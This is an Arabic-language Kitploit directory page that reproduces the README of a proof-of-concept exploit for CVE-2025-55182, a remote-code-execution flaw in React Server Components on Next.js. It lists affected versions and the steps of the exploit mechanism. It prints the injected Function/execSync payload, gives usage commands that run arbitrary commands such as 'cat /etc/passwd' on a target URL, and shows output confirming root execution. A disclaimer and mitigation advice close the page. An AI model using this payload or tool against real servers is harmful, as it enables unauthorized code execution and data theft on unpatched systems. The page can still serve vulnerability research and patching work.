Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182_PoC — إثبات المفهوم لثغرة RCE لـ CVE‑2025‑55182 تستغل بروتوكول React Flight على Next.js App Router. | Kitploit
أدوات/GitHubGitHub/rl0x01/cve-2025-55182_poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubrl0x01/cve-2025-55182_poc

CVE-2025-55182_PoC

إثبات المفهوم لثغرة RCE لـ CVE‑2025‑55182 تستغل بروتوكول React Flight على Next.js App Router.

عرض المستودع
12منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 - إثبات مفهوم تنفيذ التعليمات البرمجية عن بعد لمكونات خادم React

المؤلف: rl0x01

الوصف

CVE-2025-55182 هي ثغرة حرجة (CVSS 10.0) من نوع تنفيذ التعليمات البرمجية عن بعد (RCE) تؤثر على مكونات خادم React عبر بروتوكول Flight.

الإصدارات المتأثرة

Next.jsReact
14.3.0-canary.77 to 15.0.419.0.0
15.1.1-canary.0 to 15.1.819.1.0
15.2.0-canary.0 to 15.2.519.1.1
15.3.0-canary.0 to 15.3.519.2.0
15.4.0-canary.0 to 15.4.7
15.5.1-canary.0 to 15.5.6
16.0.0-canary.0 to 16.0.6

الإصدارات المصححة

Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+

آلية الاستغلال

  1. يستخدم $@ للحصول على مرجع Chunk خام
  2. يستبدل .then بـ Chunk.prototype.then عبر $1:__proto__:then
  3. يضبط status على resolved_model لتفعيل initializeModelChunk
  4. يستخدم $B1337 لتفعيل إلغاء تسلسل Blob
  5. يوجه _formData.get إلى مُنشئ Function
  6. يحتوي _prefix على كود JS المراد تنفيذه

يتم تقييم الكود عبر:

root@kitploit:~
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")

التثبيت

root@kitploit:~
pip install -r requirements.txt

الاستخدام

التحقق مما إذا كان الهدف ضعيفًا

root@kitploit:~
python cve_2025_55182_poc.py https://target.com --check-only

تنفيذ أمر

root@kitploit:~
# الأمر الافتراضي (id)
python cve_2025_55182_poc.py https://target.com

# أمر مخصص
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"

الخيارات

الخيارالوصف
urlعنوان الهدف (مطلوب)
-c, --commandالأمر المراد تنفيذه (الافتراضي: id)
--check-onlyالتحقق من الثغرة فقط
-t, --timeoutالمهلة بالثواني (الافتراضي: 15)
-v, --verboseإخراج مفصل
--rawعرض الاستجابة الخام

مختبر الاختبار الضعيف

root@kitploit:~
cd vulnerable-app
npm install
npm run dev
# الخادم على http://localhost:3000

مثال على الإخراج

root@kitploit:~
+======================================================================+
|  CVE-2025-55182 - تنفيذ التعليمات البرمجية عن بعد لمكونات خادم React       |
|  ثغرة إلغاء تسلسل بروتوكول Flight في React                              |
+======================================================================+
[*] المتأثر: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] درجة CVSS: 10.0 (حرج)
[*] المؤلف: rl0x01

[*] الهدف: http://localhost:3000
[*] المهلة: 15ث

[1/2] جارٍ التحقق من الثغرة...
[+] ضعيف! تم تأكيد RCE - تم استلام الإخراج

[2/2] تنفيذ الأمر: whoami
[+] تم إرسال الحمولة!

============================================================
النتيجة: whoami
============================================================
root
============================================================

هيكل المشروع

root@kitploit:~
CVE-2025-55182/
├── cve_2025_55182_poc.py    # نص الاستغلال الرئيسي
├── requirements.txt          # تبعيات بايثون
├── README.md                 # التوثيق
└── vulnerable-app/           # تطبيق Next.js ضعيف للاختبار
    ├── package.json
    ├── next.config.js
    └── app/
        ├── layout.js
        ├── page.js
        └── actions.js

إخلاء المسؤولية

⚠️ يتم توفير هذه الأداة لأغراض تعليمية واختبار أمني مصرح به فقط.

الاستخدام غير المصرح به لهذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني.

التخفيف

  1. تحديث Next.js إلى 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, أو 16.0.7+
  2. تحديث React إلى إصدار مصحح
  3. تنفيذ قواعد جدار حماية تطبيقات الويب (WAF) لحظر حمولات بروتوكول Flight الخبيثة
تنزيل الأداة